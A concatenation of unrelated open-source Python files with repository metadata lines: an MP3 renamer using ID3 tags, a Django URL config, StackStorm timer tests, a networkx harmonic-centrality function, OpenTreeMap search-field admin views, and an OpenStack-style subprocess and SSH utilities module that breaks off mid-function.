            #if _c: _coverage('datalenindic')
        frame.rawData = self._readBytes(cbData, 'rev3data')
        return frame
    def getValue(self, id):
        """ Return the value for an ID3 tag id, or for a
            convenience label ('title', 'performer', ...),
            or return None if there is no such value.
        """
        if self.frames.has_key(id):
            if hasattr(self.frames[id], 'value'):
                return self.frames[id].value
        if _simpleDataMapping.has_key(id):
            # Convenience label: try each concrete id in preference order.
            for id2 in _simpleDataMapping[id]:
                v = self.getValue(id2)
                if v:
                    return v
        return None
    def getRawData(self, id):
        """Return the undecoded payload for a frame id, or None."""
        if self.frames.has_key(id):
            return self.frames[id].rawData
        return None
    def dump(self):
        """Print the header, all frames, and the convenience labels (debug aid)."""
        import pprint
        print "Header:"
        print self.header
        print "Frames:"
        for fr in self.allFrames:
            # Truncate long payloads so the dump stays readable.
            if len(fr.rawData) > 30:
                fr.rawData = fr.rawData[:30]
        pprint.pprint(self.allFrames)
        for fr in self.allFrames:
            if hasattr(fr, 'value'):
                print '%s: %s' % (fr.id, _safestr(fr.value))
            else:
                print '%s= %s' % (fr.id, _safestr(fr.rawData))
        for label in _simpleDataMapping.keys():
            v = self.getValue(label)
            if v:
                print 'Label %s: %s' % (label, _safestr(v))
    def dumpCoverage(self):
        """Print the code-path coverage counters collected when _c is on."""
        feats = _features.keys()
        feats.sort()
        for feat in feats:
            print "Feature %-12s: %d" % (feat, _features[feat])
# chars not allowed in filenames
illegal_chars = u'/\?=+<>:;"*|!@#$%^&*'
# http://code.activestate.com/recipes/65441/
def has_chars(raw, bad_chars):
    """Return True if raw contains any character from bad_chars."""
    try:
        return any(bad in raw for bad in bad_chars)
    except UnicodeDecodeError:
        return False
def replace_illegal_chars(raw):
    """Return raw with every illegal filename character replaced by '_'."""
    return ''.join('_' if ch in illegal_chars else ch for ch in raw)
def asci(*args):
    """Print each argument ASCII-safely (non-ASCII becomes XML char refs)."""
    for arg in args:
        # Trailing comma: stay on one line, separated by spaces.
        print arg.encode('us-ascii','xmlcharrefreplace'),
    print
def is_dupe(oldmp3, newmp3):
    """True when oldmp3's base name starts with newmp3's base name
    (case-insensitive), i.e. the file already carries the proposed name.
    """
    base_old = os.path.splitext(oldmp3)[0]
    base_new = os.path.splitext(newmp3)[0]
    return base_old.lower().startswith(base_new.lower())
def parse_index(f):
    """Split a trailing "[n]" duplicate-index suffix off a base file name.

    Returns (name, index) where index is an int; index is 0 when no
    "[n]" suffix is present. Returning an int (instead of the raw regex
    group, a str) fixes a TypeError in the renaming loop, which computes
    ``idx + i`` on this result.
    """
    # Raw string so the regex escapes are not interpreted by Python first.
    rx = re.compile(r'(?P<name>.+)\[(?P<index>\d+?)\]$')
    mo = rx.search(f)
    if mo:
        return mo.group('name'), int(mo.group('index'))
    return f, 0
if __name__ == '__main__':
    # Rename MP3 files in a folder using their ID3 tags
    # ('Track_01.mp3' >> '01 - Title.mp3'), optionally into artist/album dirs.
    import os
    import optparse
    dodirs = False
    parser = optparse.OptionParser()
    parser.add_option('-l','--list',
        action="store_true",
        help='List ID3 tags only with no renaming',
        default=False
        )
    parser.add_option('-d', '--dirs',
        action="store_true",
        help="create album dirs",
        default=False)
    (opts, args) = parser.parse_args(sys.argv[1:])
    # First positional argument (if any) is the folder to process.
    if len(args):
        mp3dir = unicode(args[0])
    else:
        mp3dir = u'.'
    print
    if opts.list:
        print 'Listing ID3 tags in folder:', asci(os.path.abspath(mp3dir))
    else:
        print 'Renaming MP3 files in folder:', asci(os.path.abspath(mp3dir))
    print
    for fname in os.listdir(mp3dir):
        # uncomment if you want to process only files with .mp3 extension
        # if not fname.lower().endswith(MP3):
        # continue
        if os.path.isdir(fname):
            continue
        absfname = os.path.join(mp3dir, fname)
        try:
            id3r = Reader(absfname)
        except (Id3Error, UnicodeDecodeError), e:
            print e
            continue
        #id3r.dump()
        album = id3r.getValue('album')
        track = id3r.getValue('track')
        artist = id3r.getValue('performer')
        title = id3r.getValue('title')
        year = id3r.getValue('year')
        ### move files to dirs according to artist, album
        if opts.dirs and artist and album:
            dodirs = True
            mp3dir_full = os.path.join(mp3dir,
                replace_illegal_chars(artist),
                replace_illegal_chars(album))
            if not os.path.exists(mp3dir_full):
                try:
                    os.makedirs(mp3dir_full)
                except (IOError,WindowsError), e :
                    # NOTE(review): WindowsError only exists on Windows; on
                    # other platforms this except clause raises NameError.
                    print
        else:
            mp3dir_full = mp3dir
        if not title:
            continue
        # replace tracks like '2/15' >> '02'
        if track and u'/' in track:
            track = track.split('/')[0]
        if track:
            track = track.zfill(2) # zero fill, i. e. '1' >> '01'
        if not track:
            track = ''
        if has_chars(title, illegal_chars):
            title = replace_illegal_chars(title)
        try:
            if isinstance(track, unicode) or isinstance(title, unicode):
                new_fname = track + u' - ' + title + u'.' + MP3
            ## try to fix non-unicode strings, only trying 'latin1'
            if isinstance(track, str) or isinstance(title, str):
                new_fname = track + ' - ' + title.decode('latin1') + '.' + MP3
        except UnicodeDecodeError:
            print 'Encoding error while processing title/track'
            continue
        new_dir = dodirs and mp3dir_full or mp3dir
        proposed_new_name = os.path.join(new_dir, new_fname)
        maxwidth = 35
        if opts.list:
            print '>',
        else:
            if not is_dupe(absfname, proposed_new_name):
                if os.path.exists(proposed_new_name):
                    for i in range(1,1000): # try indexed names for up to 999 duplicates
                        parsed_name, idx = parse_index(os.path.splitext(proposed_new_name)[0])
                        # NOTE(review): confirm idx is numeric here -- if
                        # parse_index returns the raw regex group (a str),
                        # idx+i raises TypeError.
                        new_fname = parsed_name + u'[' + unicode(idx+i) + u'].' + MP3
                        if not os.path.exists(new_fname):
                            break
                try:
                    os.rename(absfname, os.path.join(new_dir, new_fname))
                except Exception, e:
                    asci( 'Error: ', absfname.ljust(maxwidth), '>>>', proposed_new_name, str(e) )
            else:
                maxwidth -= len('Skipping...') + 1
                print 'Skipping...',
        asci((len(fname) > maxwidth and fname[:maxwidth-3] or fname).ljust(maxwidth), ' >>> ', new_fname)
| ActiveState/code | recipes/Python/576811_Rename_MP3_files_ID3_tags_does_not_require/recipe-576811.py | Python | mit | 26,410 |
# -*- coding: utf-8 -*-
"""
Run cross-validation analysis
@author: Yuriy Sverchkov (yuriy.sverchkov@wisc.edu)
"""
from sys import argv
from pandas import read_csv
from analysis_pipeline import run_analysis_pipeline
if __name__ == '__main__':
    # Command line: <training csv> <panel size> <output pickle file>
    training_filename = argv[1]
    panel_size = int(argv[2])
    pickled_filename = argv[3]
    result = run_analysis_pipeline(
        data=read_csv(training_filename),
        panel_size=panel_size,
        output_file_name=pickled_filename,
    )
| sverchkov/ivancic-panel-selection | python/run_cv_analysis.py | Python | mit | 531 |
from django.conf import settings
from django.conf.urls.static import static
from django.conf.urls import patterns, include, url
from django.contrib import admin
# URL routes: admin site, media files served by Django, then everything
# else delegated to the wallfly app. Uses the legacy patterns() helper
# (removed in Django 1.10), so this targets Django <= 1.9.
urlpatterns = patterns('',
    url(r'^admin/', include(admin.site.urls)),
    # Serve uploaded media directly (development setup, not for production).
    url(r'^media/(?P<path>.*)$', 'django.views.static.serve', {
        'document_root': settings.MEDIA_ROOT,
    }),
    url(r'^', include('wallfly.urls')),
) + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| trcm/sacerdos | sacerdos/urls.py | Python | mit | 557 |
# uncompyle6 version 2.9.10
# Python bytecode 2.7 (62211)
# Decompiled from: Python 3.6.0b2 (default, Oct 11 2016, 05:27:10)
# [GCC 6.2.0 20161005]
# Embedded file name: type_Params.py
from types import *
class Params:
    """Parameter bag for the portmap command (decompiled source).

    Only the attributes 'maxPorts' and 'memory' are accepted; any other
    attribute access raises AttributeError. Marshal/Demarshal convert the
    parameters to and from the MCL message format.
    """
    def __init__(self):
        # Defaults; assigned via __dict__ to bypass the custom __setattr__.
        self.__dict__['maxPorts'] = 500
        self.__dict__['memory'] = 256000
    def __getattr__(self, name):
        if name == 'maxPorts':
            return self.__dict__['maxPorts']
        if name == 'memory':
            return self.__dict__['memory']
        raise AttributeError("Attribute '%s' not found" % name)
    def __setattr__(self, name, value):
        if name == 'maxPorts':
            self.__dict__['maxPorts'] = value
        elif name == 'memory':
            self.__dict__['memory'] = value
        else:
            raise AttributeError("Attribute '%s' not found" % name)
    def Marshal(self, mmsg):
        """Append both parameters to mmsg as a nested marshal message."""
        # NOTE(review): the MSG_KEY_PARAMS* constants are not defined in this
        # file; presumably supplied by a star-import in the original -- confirm.
        from mcl.object.Message import MarshalMessage
        submsg = MarshalMessage()
        submsg.AddU32(MSG_KEY_PARAMS_MAX_PORTS, self.__dict__['maxPorts'])
        submsg.AddU32(MSG_KEY_PARAMS_MEMORY, self.__dict__['memory'])
        mmsg.AddMessage(MSG_KEY_PARAMS, submsg)
    def Demarshal(self, dmsg, instance=-1):
        """Read both parameters back from dmsg; missing fields keep defaults."""
        import mcl.object.Message
        msgData = dmsg.FindData(MSG_KEY_PARAMS, mcl.object.Message.MSG_TYPE_MSG, instance)
        submsg = mcl.object.Message.DemarshalMessage(msgData)
        try:
            self.__dict__['maxPorts'] = submsg.FindU32(MSG_KEY_PARAMS_MAX_PORTS)
        except:
            pass
        try:
            self.__dict__['memory'] = submsg.FindU32(MSG_KEY_PARAMS_MEMORY)
        except:
            pass
# Licensed to the StackStorm, Inc ('StackStorm') under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import bson
import mock
from st2common.constants.triggers import TIMER_TRIGGER_TYPES
from st2common.models.db.trigger import TriggerDB
from st2common.models.system.common import ResourceReference
from st2common.persistence.trigger import TriggerType
from st2common.persistence.trigger import Trigger
from st2reactor.timer.base import St2Timer
from st2tests.base import CleanDbTestCase
class St2TimerTestCase(CleanDbTestCase):
    """Tests for St2Timer startup registration and trigger dispatching."""
    def test_trigger_types_are_registered_on_start(self):
        """Starting the timer must create a TriggerType per timer type."""
        timer = St2Timer()
        timer._scheduler = mock.Mock()
        # Verify there are no TriggerType in the db when we start
        self.assertItemsEqual(TriggerType.get_all(), [])
        timer.start()
        # Verify TriggerType objects have been created
        trigger_type_dbs = TriggerType.get_all()
        self.assertEqual(len(trigger_type_dbs), len(TIMER_TRIGGER_TYPES))
        timer_trigger_type_refs = TIMER_TRIGGER_TYPES.keys()
        for trigger_type in trigger_type_dbs:
            ref = ResourceReference(pack=trigger_type.pack, name=trigger_type.name).ref
            self.assertTrue(ref in timer_trigger_type_refs)
    def test_existing_rules_are_loaded_on_start(self):
        # Assert that we dispatch message for every existing Trigger object
        St2Timer._handle_create_trigger = mock.Mock()
        timer = St2Timer()
        timer._scheduler = mock.Mock()
        timer._trigger_watcher.run = mock.Mock()
        # Verify there are no Trigger and TriggerType in the db when we start
        self.assertItemsEqual(Trigger.get_all(), [])
        self.assertItemsEqual(TriggerType.get_all(), [])
        # Add a dummy timer Trigger object
        type_ = TIMER_TRIGGER_TYPES.keys()[0]
        parameters = {'unit': 'seconds', 'delta': 1000}
        trigger_db = TriggerDB(id=bson.ObjectId(), name='test_trigger_1', pack='dummy',
                               type=type_, parameters=parameters)
        trigger_db = Trigger.add_or_update(trigger_db)
        # Verify object has been added
        self.assertEqual(len(Trigger.get_all()), 1)
        timer.start()
        # Block until the watcher has loaded existing triggers.
        timer._trigger_watcher._load_thread.wait()
        # Verify handlers are called
        timer._handle_create_trigger.assert_called_with(trigger_db)
    @mock.patch('st2common.transport.reactor.TriggerDispatcher.dispatch')
    def test_timer_trace_tag_creation(self, dispatch_mock):
        """Emitting a trigger instance must build a '<type name>-<trigger name>' trace tag."""
        timer = St2Timer()
        timer._scheduler = mock.Mock()
        timer._trigger_watcher = mock.Mock()
        # Add a dummy timer Trigger object
        type_ = TIMER_TRIGGER_TYPES.keys()[0]
        parameters = {'unit': 'seconds', 'delta': 1}
        trigger_db = TriggerDB(name='test_trigger_1', pack='dummy', type=type_,
                               parameters=parameters)
        timer.add_trigger(trigger_db)
        timer._emit_trigger_instance(trigger=trigger_db.to_serializable_dict())
        # The trace context handed to dispatch carries the expected tag.
        self.assertEqual(dispatch_mock.call_args[1]['trace_context'].trace_tag,
                         '%s-%s' % (TIMER_TRIGGER_TYPES[type_]['name'], trigger_db.name))
| punalpatel/st2 | st2reactor/tests/unit/test_timer.py | Python | apache-2.0 | 3,837 |
# Copyright (C) 2015 by
# Alessandro Luongo
# BSD license.
"""Functions for computing the harmonic centrality of a graph."""
from __future__ import division
import networkx as nx
__author__ = "\n".join(['Alessandro Luongo (alessandro.luongo@studenti.unimi.it'])
__all__ = ['harmonic_centrality']
def harmonic_centrality(G, distance=None):
    r"""Compute harmonic centrality for nodes.

    The harmonic centrality [1]_ of a node `u` is the sum of the
    reciprocal of the shortest path distances from all other nodes to `u`

    .. math::

        C(u) = \sum_{v \neq u} \frac{1}{d(v, u)}

    where `d(v, u)` is the shortest-path distance between `v` and `u`.
    Higher values indicate higher centrality.

    Parameters
    ----------
    G : graph
      A NetworkX graph

    distance : edge attribute key, optional (default=None)
      Use the specified edge attribute as the edge distance in shortest
      path calculations. If `None`, then each edge will have distance equal to 1.

    Returns
    -------
    nodes : dictionary
      Dictionary of nodes with harmonic centrality as the value.

    See Also
    --------
    betweenness_centrality, load_centrality, eigenvector_centrality,
    degree_centrality, closeness_centrality

    Notes
    -----
    If the 'distance' keyword is set to an edge attribute key then the
    shortest-path length will be computed using Dijkstra's algorithm with
    that edge attribute as the edge weight.

    References
    ----------
    .. [1] Boldi, Paolo, and Sebastiano Vigna. "Axioms for centrality."
           Internet Mathematics 10.3-4 (2014): 222-262.
    """
    # Distances *to* u in G equal distances *from* u in the reversed graph.
    if G.is_directed():
        G = G.reverse()
    centrality = {}
    for node, dist_dict in nx.shortest_path_length(G, weight=distance):
        # The zero self-distance contributes nothing and is skipped.
        centrality[node] = sum(1 / d for d in dist_dict.values() if d > 0)
    return centrality
| cmtm/networkx | networkx/algorithms/centrality/harmonic.py | Python | bsd-3-clause | 1,825 |
# -*- coding: utf-8 -*-
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import division
from copy import deepcopy
from django.utils.translation import ugettext as _
from opentreemap.util import json_from_request
from treemap.models import Species
from treemap.util import to_model_name, safe_get_model_class, to_object_name
from treemap.lib.object_caches import udf_defs
from treemap.search_fields import (
set_search_field_label, ALERT_IDENTIFIER_PATTERN, get_alert_field_info)
def set_fields(request, instance):
    """Persist the detail-field configuration posted by the admin UI."""
    payload = json_from_request(request)
    instance.web_detail_fields = payload['web_detail_fields']
    instance.mobile_api_fields = payload['mobile_api_fields']
    instance.save()
    return {'success': True}
def set_fields_page(request, instance):
    """Build template context for the detail/mobile field configuration page.

    Returns the instance plus the mobile and web field groups, each group
    annotated with the fields and collection UDFs currently disabled.
    """
    mobile_field_groups = deepcopy(instance.mobile_api_fields)
    web_field_groups = deepcopy(instance.web_detail_fields)
    # Group headers whose collection UDFs must match the header name exactly.
    collection_groups = ('Stewardship', 'Alerts')
    def get_disabled_fields(group):
        # "Model.field" keys for trackable fields not enabled in this group.
        model_name = to_model_name(group['model'])
        Model = safe_get_model_class(model_name)
        mobj = Model(instance=instance)
        model_fields = {field for field in mobj.tracked_fields
                        if _should_show_field(mobj, field)}
        model_fields = {'%s.%s' % (group['model'], f) for f in model_fields}
        disabled_fields = model_fields - set(group['field_keys'])
        return sorted(disabled_fields)
    def get_disabled_cudfs(group):
        # Collection UDF full names applicable to the group but not enabled.
        if 'model' in group:
            models = (to_model_name(group['model']), )
        else:
            # Groups without an explicit model apply to trees and plots.
            models = ('Tree', 'Plot')
        udfs = {udf.full_name for udf in udf_defs(instance)
                if udf.iscollection and udf.model_type in models and
                (group['header'] not in collection_groups
                 or udf.name == group['header'])}
        disabled_cudfs = udfs - set(group['collection_udf_keys'])
        return sorted(disabled_cudfs)
    for field_groups in (web_field_groups, mobile_field_groups):
        for group in field_groups:
            if 'field_keys' in group:
                group['disabled_fields'] = get_disabled_fields(group)
                group['category'] = group['model']
            if 'collection_udf_keys' in group:
                group['disabled_cudf_fields'] = get_disabled_cudfs(group)
    return {
        'instance': instance,
        'mobile_field_groups': mobile_field_groups,
        'web_field_groups': web_field_groups,
    }
def set_search_config(request, instance):
    """Merge posted search configuration into the instance and save it.

    Expects a JSON body with 'search_config' and 'mobile_search_fields'
    keys; each entry overwrites the matching key of the instance's
    stored configuration, other stored keys are preserved.
    """
    search_fields = json_from_request(request)
    for prop in ('search_config', 'mobile_search_fields'):
        config = deepcopy(getattr(instance, prop))
        # dict.update replaces the old per-key loop, which unpacked each
        # value and then ignored it, looking every value up a second time.
        config.update(search_fields[prop])
        setattr(instance, prop, config)
    instance.save()
def search_config(request, instance):
    """Template context for the search-configuration page (web + mobile)."""
    return {
        'instance': instance,
        'website_field_groups': _website_search_config(instance),
        'mobile_field_groups': _mobile_search_config(instance),
    }
def _website_search_config(instance):
    """Build the per-model filter groups shown on the web search page.

    Returns one group per searchable model (Tree and Plot first, then
    the instance's other map feature types) plus a final "missing data"
    group that spans all models.
    """
    map_feature_types = sorted(instance.map_feature_types)
    # Plot is re-added at a fixed position below, after Tree.
    map_feature_types.remove('Plot')
    model_names = ['Tree', 'Plot']
    model_names.extend(map_feature_types)
    fields_by_model = {model_name: sorted(_get_fields(instance, model_name))
                       for model_name in model_names}
    def get_context_for_model(model_name):
        model_fields = fields_by_model[model_name]
        enabled, disabled = get_enabled_and_disabled_fields(model_name,
                                                           model_fields)
        display_name = safe_get_model_class(model_name).display_name(instance)
        return {
            'field_keys': enabled,
            'disabled_fields': disabled,
            'header': _('%(model)s Filters') % {'model': display_name},
            'category': model_name,
        }
    def get_context_for_missing():
        # The missing-data group covers every model's fields plus two
        # pseudo-fields for "has species" / "has photo".
        all_fields = ['species.id', 'mapFeaturePhoto.id']
        for model_name in model_names:
            all_fields.extend(fields_by_model[model_name])
        enabled, disabled = get_enabled_and_disabled_fields('missing',
                                                           all_fields)
        enabled = _add_field_info(instance, enabled)
        disabled = _add_field_info(instance, disabled)
        return {
            'field_keys': enabled,
            'disabled_fields': disabled,
            'header': _('Missing Data Filters'),
            'category': 'missing'
        }
    def get_enabled_and_disabled_fields(category, fields):
        # Enabled fields come (in order) from the saved search config;
        # everything else in `fields` is offered as disabled.
        current_search_fields = instance.search_config.get(category, [])
        enabled_fields = [f['identifier'] for f in current_search_fields]
        disabled_fields = (set(fields) - set(enabled_fields))
        return enabled_fields, sorted(disabled_fields)
    field_groups = [get_context_for_model(model_name)
                    for model_name in model_names]
    field_groups.append(get_context_for_missing())
    return field_groups
def _mobile_search_config(instance):
    """Build the two filter groups (standard + missing-data) for mobile.

    Unlike the website config, mobile pools Tree, Plot and Species
    fields into each group rather than one group per model.
    """
    all_fields = []
    for model_name in ['Tree', 'Plot', 'Species']:
        all_fields += _get_fields(instance, model_name)
    def get_context_for_group(category, header):
        fields = list(all_fields)
        if category == 'missing':
            fields += ['species.id', 'mapFeaturePhoto.id']
        else:
            fields += ['species.id']
            if contains_alerts():
                fields += alert_identifiers()
        enabled, disabled = get_enabled_and_disabled_fields(category, fields)
        return {
            'field_keys': enabled,
            'disabled_fields': disabled,
            'header': header,
            'category': category
        }
    def get_enabled_and_disabled_fields(category, fields):
        current_search_fields = instance.mobile_search_fields.get(category, [])
        enabled_fields = [f['identifier'] for f in current_search_fields]
        disabled_fields = set(fields) - set(enabled_fields)
        return (_add_field_info(instance, enabled_fields),
                sorted(_add_field_info(instance, disabled_fields)))
    def contains_alerts():
        # Alerts are a latreemap-only feature (hard-coded instance check).
        return instance.url_name == 'latreemap'
    def alert_identifiers():
        # Identifiers look like 'udf:<model>:<pk>.Status'.
        def identifier(udf):
            model_name = udf.model_type.lower()
            return 'udf:%(model)s:%(pk)s.Status' % {
                'model': model_name, 'pk': udf.pk}
        return [identifier(udf) for udf in udf_defs(instance)
                if udf.iscollection and udf.name == 'Alerts']
    # NOTE(review): add_alert_info is never called, and it invokes
    # get_alert_field_info with one argument while every other call site
    # passes (identifier, instance) — likely dead code; confirm and remove.
    def add_alert_info(field_identifiers):
        return [get_alert_field_info(id)
                if ALERT_IDENTIFIER_PATTERN.match(id) else id
                for id in field_identifiers]
    return [
        get_context_for_group('standard', _('Detail Filters')),
        get_context_for_group('missing', _('Missing Data Filters'))
    ]
def _add_field_info(instance, field_names):
    """Convert field identifiers into display-ready field-info dicts.

    Identifiers matching ALERT_IDENTIFIER_PATTERN get alert-specific
    labels; all others get a standard search-field label.
    """
    def field_context(identifier):
        if ALERT_IDENTIFIER_PATTERN.match(identifier):
            return get_alert_field_info(identifier, instance)
        else:
            # BUG FIX: this previously referenced the enclosing
            # comprehension variable 'field_name' instead of the
            # 'identifier' parameter — it only worked via Python 2's
            # leaking comprehension scope and breaks under Python 3.
            return set_search_field_label(instance,
                                          {'identifier': identifier})
    return [field_context(field_name) for field_name in field_names]
def _should_show_field(model, field_name):
if field_name.startswith('udf:'):
return True
elif field_name == 'id':
return False
elif model == Species:
# latreemap shows these; it's easiest to include them for all maps
return field_name in ['is_native', 'palatable_human']
field = model._meta.get_field(field_name)
return getattr(field, '_verbose_name', None) is not None
def _get_fields(instance, model_name):
    """Return the set of searchable field keys for a model.

    Keys are qualified as '<objectName>.<field>' and include both
    showable concrete (non-relation) model fields and the model's
    non-collection UDF names.
    """
    Model = safe_get_model_class(model_name)
    mobj = Model(instance=instance)
    udfs = {udf.canonical_name
            for udf in udf_defs(instance, model_name)
            if not udf.iscollection}
    concrete_fields = {
        f.name for f in mobj._meta.get_fields(include_parents=False)
        if _should_show_field(Model, f.name) and not f.is_relation}
    model_fields = concrete_fields | udfs
    model_fields = {'%s.%s' % (to_object_name(model_name), f)
                    for f in model_fields}
    return model_fields
| maurizi/otm-core | opentreemap/manage_treemap/views/fields.py | Python | agpl-3.0 | 8,599 |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2011 Justin Santa Barbara
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Utilities and helper functions."""
import contextlib
import datetime
import errno
import functools
import hashlib
import inspect
import os
import pyclbr
import random
import re
import shlex
import shutil
import signal
import socket
import struct
import sys
import tempfile
import time
import uuid
import weakref
from xml.sax import saxutils
from eventlet import event
from eventlet.green import subprocess
from eventlet import greenthread
from eventlet import semaphore
import netaddr
from traffic.openstack.common.gettextutils import _
from traffic.common import deprecated
from traffic import exception
from traffic import flags
from traffic.openstack.common import cfg
from traffic.openstack.common import excutils
from traffic.openstack.common import importutils
from traffic.openstack.common import log as logging
from traffic.openstack.common import timeutils
# Module-level logger and flag registry for this utilities module.
LOG = logging.getLogger(__name__)
FLAGS = flags.FLAGS
# Lets operators disable the file-based external locks used by
# @synchronized(..., external=True) below.
FLAGS.register_opt(
    cfg.BoolOpt('disable_process_locking', default=False,
                help='Whether to disable inter-process locks'))
def vpn_ping(address, port, timeout=0.05, session_id=None):
    """Sends a vpn negotiation packet and returns the server session.

    Returns False on a failure. Basic packet structure is below.

    Client packet (14 bytes)::

         0 1        8 9  13
        +-+--------+-----+
        |x| cli_id |?????|
        +-+--------+-----+
        x = packet identifier 0x38
        cli_id = 64 bit identifier
        ? = unknown, probably flags/padding

    Server packet (26 bytes)::

         0 1        8 9  13 14    21 2225
        +-+--------+-----+--------+----+
        |x| srv_id |?????| cli_id |????|
        +-+--------+-----+--------+----+
        x = packet identifier 0x40
        cli_id = 64 bit identifier
        ? = unknown, probably flags/padding
        bit 9 was 1 and the rest were 0 in testing
    """
    if session_id is None:
        session_id = random.randint(0, 0xffffffffffffffff)
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    data = struct.pack('!BQxxxxx', 0x38, session_id)
    sock.sendto(data, (address, port))
    sock.settimeout(timeout)
    try:
        received = sock.recv(2048)
    except socket.timeout:
        return False
    finally:
        sock.close()
    fmt = '!BQxxxxxQxxxx'
    if len(received) != struct.calcsize(fmt):
        # BUG FIX: was a bare debugging `print` of the expected size;
        # log the malformed reply instead.
        LOG.debug(_('vpn_ping: expected %(expected)d bytes, got %(got)d'),
                  {'expected': struct.calcsize(fmt), 'got': len(received)})
        return False
    (identifier, server_sess, client_sess) = struct.unpack(fmt, received)
    if identifier == 0x40 and client_sess == session_id:
        return server_sess
    # BUG FIX: explicitly return False on a bad identifier/session echo
    # instead of implicitly returning None ("Returns False on a failure").
    return False
def _subprocess_setup():
    """Reset SIGPIPE to the default action (used as Popen preexec_fn).

    Python installs a SIGPIPE handler by default. This is usually not
    what non-Python subprocesses expect.
    """
    signal.signal(signal.SIGPIPE, signal.SIG_DFL)
def execute(*cmd, **kwargs):
    """Helper method to execute command with optional retry.

    If you add a run_as_root=True command, don't forget to add the
    corresponding filter to etc/traffic/rootwrap.d !

    :param cmd: Passed to subprocess.Popen.
    :param process_input: Send to opened process.
    :param check_exit_code: Single bool, int, or list of allowed exit
                            codes. Defaults to [0]. Raise
                            exception.ProcessExecutionError unless
                            program exits with one of these code.
    :param delay_on_retry: True | False. Defaults to True. If set to
                           True, wait a short amount of time
                           before retrying.
    :param attempts: How many times to retry cmd.
    :param run_as_root: True | False. Defaults to False. If set to True,
                        the command is prefixed by the command specified
                        in the root_helper FLAG.

    :raises exception.TrafficException: on receiving unknown arguments
    :raises exception.ProcessExecutionError:

    :returns: a tuple, (stdout, stderr) from the spawned process, or None if
             the command fails.
    """
    process_input = kwargs.pop('process_input', None)
    check_exit_code = kwargs.pop('check_exit_code', [0])
    ignore_exit_code = False
    # Normalize check_exit_code: a bool toggles checking entirely, an
    # int is a single allowed code, a list is used as-is.
    if isinstance(check_exit_code, bool):
        ignore_exit_code = not check_exit_code
        check_exit_code = [0]
    elif isinstance(check_exit_code, int):
        check_exit_code = [check_exit_code]
    delay_on_retry = kwargs.pop('delay_on_retry', True)
    attempts = kwargs.pop('attempts', 1)
    run_as_root = kwargs.pop('run_as_root', False)
    shell = kwargs.pop('shell', False)
    if len(kwargs):
        raise exception.TrafficException(_('Got unknown keyword args '
                                           'to utils.execute: %r') % kwargs)
    if run_as_root:
        if FLAGS.rootwrap_config is None or FLAGS.root_helper != 'sudo':
            deprecated.warn(_('The root_helper option (which lets you specify '
                              'a root wrapper different from traffic-rootwrap, '
                              'and defaults to using sudo) is now deprecated. '
                              'You should use the rootwrap_config option '
                              'instead.'))
        if (FLAGS.rootwrap_config is not None):
            cmd = ['sudo', 'traffic-rootwrap', FLAGS.rootwrap_config] + list(cmd)
        else:
            cmd = shlex.split(FLAGS.root_helper) + list(cmd)
    cmd = map(str, cmd)
    while attempts > 0:
        attempts -= 1
        try:
            LOG.debug(_('Running cmd (subprocess): %s'), ' '.join(cmd))
            _PIPE = subprocess.PIPE  # pylint: disable=E1101
            obj = subprocess.Popen(cmd,
                                   stdin=_PIPE,
                                   stdout=_PIPE,
                                   stderr=_PIPE,
                                   close_fds=True,
                                   preexec_fn=_subprocess_setup,
                                   shell=shell)
            result = None
            if process_input is not None:
                result = obj.communicate(process_input)
            else:
                result = obj.communicate()
            obj.stdin.close()  # pylint: disable=E1101
            _returncode = obj.returncode  # pylint: disable=E1101
            LOG.debug(_('Result was %s') % _returncode)
            if not ignore_exit_code and _returncode not in check_exit_code:
                (stdout, stderr) = result
                # NOTE(review): stray debugging print of the failed
                # command (Python-2-only syntax); should be removed or
                # turned into a LOG.debug call.
                print ' '.join(cmd)
                raise exception.ProcessExecutionError(
                        exit_code=_returncode,
                        stdout=stdout,
                        stderr=stderr,
                        cmd=' '.join(cmd))
            return result
        except exception.ProcessExecutionError:
            if not attempts:
                raise
            else:
                LOG.debug(_('%r failed. Retrying.'), cmd)
                if delay_on_retry:
                    greenthread.sleep(random.randint(20, 200) / 100.0)
        finally:
            # NOTE(termie): this appears to be necessary to let the subprocess
            # call clean something up in between calls, without
            # it two execute calls in a row hangs the second one
            greenthread.sleep(0)
def trycmd(*args, **kwargs):
    """
    A wrapper around execute() to more easily handle warnings and errors.

    Returns an (out, err) tuple of strings containing the output of
    the command's stdout and stderr.  If 'err' is not empty then the
    command can be considered to have failed.

    :discard_warnings   True | False. Defaults to False. If set to True,
                        then for succeeding commands, stderr is cleared
    """
    discard_warnings = kwargs.pop('discard_warnings', False)
    try:
        out, err = execute(*args, **kwargs)
        failed = False
    # NOTE(review): Python-2-only 'except X, e' syntax.
    except exception.ProcessExecutionError, exn:
        # On failure the exception text becomes the err string.
        out, err = '', str(exn)
        failed = True
    if not failed and discard_warnings and err:
        # Handle commands that output to stderr but otherwise succeed
        err = ''
    return out, err
def ssh_execute(ssh, cmd, process_input=None,
                addl_env=None, check_exit_code=True):
    """Run `cmd` over an already-connected (paramiko-style) SSH client.

    :param ssh: connected client exposing exec_command()
    :returns: (stdout, stderr) strings
    :raises exception.TrafficException: addl_env / process_input are
        not supported over SSH
    :raises exception.ProcessExecutionError: when check_exit_code is
        set and the remote command exits non-zero
    """
    LOG.debug(_('Running cmd (SSH): %s'), ' '.join(cmd))
    if addl_env:
        raise exception.TrafficException(_('Environment not supported over SSH'))
    if process_input:
        # This is (probably) fixable if we need it...
